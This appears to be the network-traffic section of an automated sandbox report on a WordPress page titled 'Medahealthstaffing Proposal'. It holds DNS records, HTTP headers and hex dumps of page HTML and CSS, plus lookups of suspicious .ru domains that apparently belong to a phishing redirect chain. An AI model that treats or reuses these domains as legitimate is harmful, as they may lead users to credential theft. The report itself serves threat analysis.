                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.259296894 CET1.1.1.1192.168.2.110xd69eNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.259296894 CET1.1.1.1192.168.2.110xd69eNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.472814083 CET1.1.1.1192.168.2.110xaf7No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.472814083 CET1.1.1.1192.168.2.110xaf7No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.472814083 CET1.1.1.1192.168.2.110xaf7No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.472814083 CET1.1.1.1192.168.2.110xaf7No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:03.944730997 CET1.1.1.1192.168.2.110x3ca0No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:03.955369949 CET1.1.1.1192.168.2.110xa3b0No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:03.955369949 CET1.1.1.1192.168.2.110xa3b0No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:03.978485107 CET1.1.1.1192.168.2.110xa852No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:03.978485107 CET1.1.1.1192.168.2.110xa852No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:03.979029894 CET1.1.1.1192.168.2.110x84d4No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.106415987 CET1.1.1.1192.168.2.110xd661No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:25.162336111 CET1.1.1.1192.168.2.110xd3cNo error (0)gzxtjeiiyvg3rulexodnny9in4rl6d7aewewrgnjekg7beli8cgba6jfk4g.lpliwptf.ru104.21.73.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:25.162336111 CET1.1.1.1192.168.2.110xd3cNo error (0)gzxtjeiiyvg3rulexodnny9in4rl6d7aewewrgnjekg7beli8cgba6jfk4g.lpliwptf.ru172.67.158.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:25.162375927 CET1.1.1.1192.168.2.110x6c13No error (0)gzxtjeiiyvg3rulexodnny9in4rl6d7aewewrgnjekg7beli8cgba6jfk4g.lpliwptf.ru65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:28.771859884 CET1.1.1.1192.168.2.110x6335No error (0)gzxtjeiiyvg3rulexodnny9in4rl6d7aewewrgnjekg7beli8cgba6jfk4g.lpliwptf.ru65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:28.772279024 CET1.1.1.1192.168.2.110x852No error (0)gzxtjeiiyvg3rulexodnny9in4rl6d7aewewrgnjekg7beli8cgba6jfk4g.lpliwptf.ru104.21.73.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:28.772279024 CET1.1.1.1192.168.2.110x852No error (0)gzxtjeiiyvg3rulexodnny9in4rl6d7aewewrgnjekg7beli8cgba6jfk4g.lpliwptf.ru172.67.158.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:29.170377016 CET8.8.8.8192.168.2.110x11a4No error (0)google.com142.250.181.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:29.174115896 CET1.1.1.1192.168.2.110x37f0No error (0)google.com172.217.17.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:42.399358034 CET8.8.8.8192.168.2.110x69d8No error (0)google.com142.250.181.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:42.400420904 CET1.1.1.1192.168.2.110xd2fdNo error (0)google.com172.217.17.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                • dnearymedahealthstaffing.wordpress.com
                                                                                                                                                                                                                                                • https:
                                                                                                                                                                                                                                                  • s0.wp.com
                                                                                                                                                                                                                                                  • s1.wp.com
                                                                                                                                                                                                                                                  • s2.wp.com
                                                                                                                                                                                                                                                  • 0.gravatar.com
                                                                                                                                                                                                                                                  • stats.wp.com
                                                                                                                                                                                                                                                  • fonts.wp.com
                                                                                                                                                                                                                                                  • pixel.wp.com
                                                                                                                                                                                                                                                  • benisp.com
                                                                                                                                                                                                                                                  • oksu.ertanduzu.ru
                                                                                                                                                                                                                                                  • cdnjs.cloudflare.com
                                                                                                                                                                                                                                                  • challenges.cloudflare.com
                                                                                                                                                                                                                                                  • code.jquery.com
                                                                                                                                                                                                                                                  • gzxtjeiiyvg3rulexodnny9in4rl6d7aewewrgnjekg7beli8cgba6jfk4g.lpliwptf.ru
                                                                                                                                                                                                                                                • a.nel.cloudflare.com
                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                0192.168.2.1149733192.0.78.134436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:30 UTC709OUTGET /medahealthstaffing-proposal/ HTTP/1.1
                                                                                                                                                                                                                                                Host: dnearymedahealthstaffing.wordpress.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:31 UTC464INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:31 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                X-hacker: Want root? Visit join.a8c.com/hacker and mention this header.
                                                                                                                                                                                                                                                Host-Header: WordPress.com
                                                                                                                                                                                                                                                Vary: accept, content-type, cookie
                                                                                                                                                                                                                                                Link: <https://wp.me/Pgfklc-m>; rel=shortlink
                                                                                                                                                                                                                                                X-ac: 1.jfk _dca MISS
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                2024-12-20 15:45:31 UTC905INData Raw: 33 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 74 69 74 6c 65 3e 4d 65 64 61 68 65 61 6c 74 68 73 74 61 66 66 69 6e 67 20 50 72 6f 70 6f 73 61 6c 20 26 23 38 32 31 31 3b 20 53 69 74 65 20 54 69 74 6c 65 3c 2f
                                                                                                                                                                                                                                                Data Ascii: 3ca<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='max-image-preview:large' /><title>Medahealthstaffing Proposal &#8211; Site Title</
                                                                                                                                                                                                                                                2024-12-20 15:45:31 UTC1369INData Raw: 21 3d 20 27 66 75 6e 63 74 69 6f 6e 27 29 20 7b 0a 09 09 09 09 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 3b 0a 09 09 09 7d 20 65 6c 73 65 20 7b 0a 09 09 09 09 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 0d 0a 61 61 61 0d 0a 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 09 09 09 09 09 6f 6c 64 6f 6e 6c 6f 61 64 28 29 3b 0a 09 09 09 09 09 66 75 6e 63 28 29 3b 0a 09 09 09 09 7d 0a 09 09 09 7d 0a 09 09 7d 0a 09 09 2f 2a 20 5d 5d 3e 20 2a 2f 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 30 2e 77 70 2e 63 6f 6d 5c 2f 77 70 2d 63 6f 6e 74 65 6e 74 5c 2f 6d 75 2d 70 6c 75 67 69 6e
                                                                                                                                                                                                                                                Data Ascii: != 'function') {window.onload = func;} else {window.onloaaaad = function () {oldonload();func();}}}/* ... */</script><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s0.wp.com\/wp-content\/mu-plugin
                                                                                                                                                                                                                                                2024-12-20 15:45:31 UTC1369INData Raw: 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 65 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 37 66 22 29 3b 63 61 73 65 22 65 6d 6f 6a 69 22 3a 72 65 74 75 72 6e 21 6e 28 65 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 57
                                                                                                                                                                                                                                                Data Ascii: \ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof W
                                                                                                                                                                                                                                                2024-12-20 15:45:31 UTC1369INData Raw: 2e 63 72 65 61 74 65 4f 62 6a 65 63 74 55 52 4c 28 72 29 2c 7b 6e 61 6d 65 3a 22 77 70 54 65 73 74 45 6d 6f 6a 69 53 75 70 70 6f 72 74 73 22 7d 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 28 61 2e 6f 6e 6d 65 73 0d 0a 38 30 30 30 0d 0a 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 20 69 6e 20 65 29 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e
                                                                                                                                                                                                                                                Data Ascii: .createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmes8000sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n
                                                                                                                                                                                                                                                2024-12-20 15:45:31 UTC1369INData Raw: 6e 67 3a 69 6e 68 65 72 69 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 69 6e 68 65 72 69 74 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 20 61 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 20 69 6d 67 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 68 65 69 67 68 74 3a 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 6f 74 74 6f 6d 7d 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 72 65 64 75 63
                                                                                                                                                                                                                                                Data Ascii: ng:inherit;line-height:inherit;text-decoration:inherit}</style><style id='wp-block-image-inline-css'>.wp-block-image a{display:inline-block}.wp-block-image img{box-sizing:border-box;height:auto;max-width:100%;vertical-align:bottom}@media (prefers-reduc
                                                                                                                                                                                                                                                2024-12-20 15:45:31 UTC1369INData Raw: 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 20 3a 77 68 65 72 65 28 66 69 67 63 61 70 74 69 6f 6e 29 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 65 6d 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 2e 69 73 2d 73 74 79 6c 65 2d 63 69 72 63 6c 65 2d 6d 61 73 6b 20 69 6d 67 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 7d 40 73 75 70 70 6f 72 74 73 20 28 28 2d 77 65 62 6b 69 74 2d 6d 61 73 6b 2d 69 6d 61 67 65 3a 6e 6f 6e 65 29 20 6f 72 20 28 6d 61 73 6b 2d 69 6d 61 67 65 3a 6e 6f 6e 65 29 29 20 6f 72 20 28 2d 77 65 62 6b 69 74 2d 6d 61 73 6b 2d 69 6d 61 67 65 3a 6e 6f 6e 65 29 7b 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 2e 69 73 2d 73 74 79 6c
                                                                                                                                                                                                                                                Data Ascii: n-right:auto}.wp-block-image :where(figcaption){margin-bottom:1em;margin-top:.5em}.wp-block-image.is-style-circle-mask img{border-radius:9999px}@supports ((-webkit-mask-image:none) or (mask-image:none)) or (-webkit-mask-image:none){.wp-block-image.is-styl
                                                                                                                                                                                                                                                2024-12-20 15:45:31 UTC1369INData Raw: 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 74 6f 70 3a 31 36 70 78 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 6f 70 61 63 69 74 79 20 2e 32 73 20 65 61 73 65 3b 77 69 64 74 68 3a 32 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 7d 2e 77 70 2d 6c 69 67 68 74 62 6f 78 2d 63 6f 6e 74 61 69 6e 65 72 20 62 75 74 74 6f 6e 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 7b 6f 75 74 6c 69 6e 65 3a 33 70 78 20 61 75 74 6f 20 23 35 61 35 61 35 61 34 30 3b 6f 75 74 6c 69 6e 65 3a 33 70 78 20 61 75 74 6f 20 2d 77 65 62 6b 69 74 2d 66 6f 63 75 73 2d 72 69 6e 67 2d 63 6f 6c 6f 72 3b 6f 75 74 6c 69 6e 65 2d 6f 66 66 73 65 74 3a 33 70 78 7d 2e 77 70 2d 6c 69 67 68 74 62 6f 78 2d 63 6f 6e 74 61 69 6e 65 72 20 62 75 74 74 6f 6e 3a 68 6f 76 65 72 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74
                                                                                                                                                                                                                                                Data Ascii: t-align:center;top:16px;transition:opacity .2s ease;width:20px;z-index:100}.wp-lightbox-container button:focus-visible{outline:3px auto #5a5a5a40;outline:3px auto -webkit-focus-ring-color;outline-offset:3px}.wp-lightbox-container button:hover{cursor:point
                                                                                                                                                                                                                                                2024-12-20 15:45:31 UTC1369INData Raw: 39 39 39 39 39 39 39 39 39 39 7d 2e 77 70 2d 6c 69 67 68 74 62 6f 78 2d 6f 76 65 72 6c 61 79 20 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 6d 61 72 67 69 6e 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 30 20 30 3b 77 69 64 74 68 3a 31 30 30 25 3b 7a 2d 69 6e 64 65 78 3a 33 30 30 30 30 30 30 7d 2e 77 70 2d 6c 69 67 68 74 62 6f 78 2d 6f 76 65 72 6c 61 79 20 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 20 69 6d 67 7b 68 65
                                                                                                                                                                                                                                                Data Ascii: 9999999999}.wp-lightbox-overlay .wp-block-image{align-items:center;box-sizing:border-box;display:flex;height:100%;justify-content:center;margin:0;position:relative;transform-origin:0 0;width:100%;z-index:3000000}.wp-lightbox-overlay .wp-block-image img{he
                                                                                                                                                                                                                                                2024-12-20 15:45:31 UTC1369INData Raw: 73 20 66 6f 72 77 61 72 64 73 7d 2e 77 70 2d 6c 69 67 68 74 62 6f 78 2d 6f 76 65 72 6c 61 79 2e 7a 6f 6f 6d 2e 73 68 6f 77 2d 63 6c 6f 73 69 6e 67 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6e 6f 74 28 2e 61 63 74 69 76 65 29 7b 61 6e 69 6d 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 2e 77 70 2d 6c 69 67 68 74 62 6f 78 2d 6f 76 65 72 6c 61 79 2e 7a 6f 6f 6d 2e 73 68 6f 77 2d 63 6c 6f 73 69 6e 67 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6e 6f 74 28 2e 61 63 74 69 76 65 29 20 2e 6c 69 67 68 74 62 6f 78 2d 69 6d 61 67 65 2d 63 6f 6e 74 61 69 6e 65 72 7b 61 6e 69 6d 61 74 69 6f 6e 3a 6c 69 67 68 74 62 6f 78 2d 7a 6f 6f 6d 2d 6f 75 74 20 2e 34 73 7d 2e 77 70 2d 6c 69 67 68 74 62 6f 78 2d 6f 76 65 72 6c 61 79 2e 7a 6f 6f 6d 2e 73 68 6f 77 2d 63 6c 6f 73 69 6e 67 2d 61 6e 69 6d 61 74 69 6f
                                                                                                                                                                                                                                                Data Ascii: s forwards}.wp-lightbox-overlay.zoom.show-closing-animation:not(.active){animation:none}.wp-lightbox-overlay.zoom.show-closing-animation:not(.active) .lightbox-image-container{animation:lightbox-zoom-out .4s}.wp-lightbox-overlay.zoom.show-closing-animatio
                                                                                                                                                                                                                                                2024-12-20 15:45:31 UTC1369INData Raw: 79 6d 6f 75 73 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 61 6c 6c 2d 63 73 73 2d 31 30 2d 31 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 73 30 2e 77 70 2e 63 6f 6d 2f 5f 73 74 61 74 69 63 2f 3f 3f 2d 65 4a 79 74 6a 45 73 4b 77 7a 41 4d 52 43 39 55 52 30 31 63 61 4c 73 6f 50 59 73 2f 49 6a 68 56 62 47 4e 5a 43 62 6c 39 48 55 4b 67 42 2b 68 6d 34 49 30 30 44 39 61 73 58 49 6f 56 59 34 56 4d 4d 6f 62 49 4d 45 70 44 69 32 56 73 6c 34 4b 77 39 4d 2f 75 30 56 33 42 53 69 41 50 6c 70 4c 37 4b 41 71 32 6d 4c 49 64 31 42 61 47 43 42 74 79 33 51 67 37 78 33 79 42 48 2b 38 73 36 6c 52 50 57 4c 4e 70 2b 34 4e 68 54 6d 6b 50 4c 34 51 4d 7a 70 51 6b 6a 41 53 38 68 6f 78 46 57 59 6e 2b 44 37 62 7a 36 53 78 32 34 58 74 2b 39 58 65 74 39 58
                                                                                                                                                                                                                                                Data Ascii: ymous' rel='stylesheet' id='all-css-10-1' href='https://s0.wp.com/_static/??-eJytjEsKwzAMRC9UR01caLsoPYs/IjhVbGNZCbl9HUKgB+hm4I00D9asXIoVY4VMMobIMEpDi2Vsl4Kw9M/u0V3BSiAPlpL7KAq2mLId1BaGCBty3Qg7x3yBH+8s6lRPWLNp+4NhTmkPL4QMzpQkjAS8hoxFWYn+D7bz6Sx24Xt+9Xet9X


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                1192.168.2.1149741192.0.77.324436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:32 UTC815OUTGET /_static/??-eJytjEsKwzAMRC9UR01caLsoPYs/IjhVbGNZCbl9HUKgB+hm4I00D9asXIoVY4VMMobIMEpDi2Vsl4Kw9M/u0V3BSiAPlpL7KAq2mLId1BaGCBty3Qg7x3yBH+8s6lRPWLNp+4NhTmkPL4QMzpQkjAS8hoxFWYn+D7bz6Sx24Xt+9Xet9XDTg56+vYhgvQ==&cssminify=yes HTTP/1.1
                                                                                                                                                                                                                                                Host: s0.wp.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                Origin: https://dnearymedahealthstaffing.wordpress.com
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                Referer: https://dnearymedahealthstaffing.wordpress.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC485INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:32 GMT
                                                                                                                                                                                                                                                Content-Type: text/css;charset=utf-8
                                                                                                                                                                                                                                                Content-Length: 48305
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                Last-Modified: Wed, 04 Dec 2024 14:58:56 GMT
                                                                                                                                                                                                                                                Etag: "67506e30-bcb1"
                                                                                                                                                                                                                                                Expires: Tue, 16 Dec 2025 17:36:21 GMT
                                                                                                                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                X-ac: 2.jfk _dfw BYPASS
                                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                X-nc: HIT jfk 2
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC884INData Raw: 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 67 72 69 64 3a 6e 6f 74 28 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 29 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 3a 6e 6f 74 28 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 29 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6c 69 73 74 2d 73 74 79 6c 65 2d 74 79 70 65 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 67 72 69 64 3a 6e 6f 74 28 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 29 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 6d 61 67 65 2c 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 67 72 69 64 3a 6e 6f 74 28 2e 68 61 73 2d 6e 65 73
                                                                                                                                                                                                                                                Data Ascii: .blocks-gallery-grid:not(.has-nested-images),.wp-block-gallery:not(.has-nested-images){display:flex;flex-wrap:wrap;list-style-type:none;margin:0;padding:0}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image,.blocks-gallery-grid:not(.has-nes
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC1369INData Raw: 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 67 72 69 64 3a 6e 6f 74 28 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 29 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 6d 61 67 65 20 66 69 67 75 72 65 2c 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 67 72 69 64 3a 6e 6f 74 28 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 29 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 74 65 6d 20 66 69 67 75 72 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 3a 6e 6f 74 28 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 29 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 6d 61 67 65 20 66 69 67 75 72 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 3a 6e 6f 74 28 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67
